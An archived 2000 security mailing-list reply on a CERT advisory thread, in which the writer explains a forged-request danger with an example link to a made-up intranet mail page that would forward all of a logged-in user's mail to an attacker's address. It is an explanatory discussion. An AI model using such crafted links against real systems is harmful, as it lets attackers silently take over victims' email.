Re: Fwd: CERT Advisory CA-2000-02

From: Cassius (sekurityat_private)
Date: Thu Feb 03 2000 - 14:11:36 PST

Next message: Henri Torgemane: "Re: Fwd: CERT Advisory CA-2000-02"

Previous message: Nick FitzGerald: "Re: Bypass Virus Checking"
Maybe in reply to: Shockroat_private: "Fwd: CERT Advisory CA-2000-02"
Next in thread: Henri Torgemane: "Re: Fwd: CERT Advisory CA-2000-02"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Shockro,

The danger is also in variables.  Pretend that I get you to click on this
link from within your custom intranet mail app.

badguyat_private">http://intranet.example.com/mailbox.asp?action=forward&item=all&recipient=badguyat_private

It would forward all of your mail to badguyat_private  This would  work
because you already have a session with mailbox.asp.

Of course mailbox.asp is fake but you get the idea.

-Cassius
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com

Next message: Henri Torgemane: "Re: Fwd: CERT Advisory CA-2000-02"
Previous message: Nick FitzGerald: "Re: Bypass Virus Checking"
Maybe in reply to: Shockroat_private: "Fwd: CERT Advisory CA-2000-02"
Next in thread: Henri Torgemane: "Re: Fwd: CERT Advisory CA-2000-02"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:33:28 PDT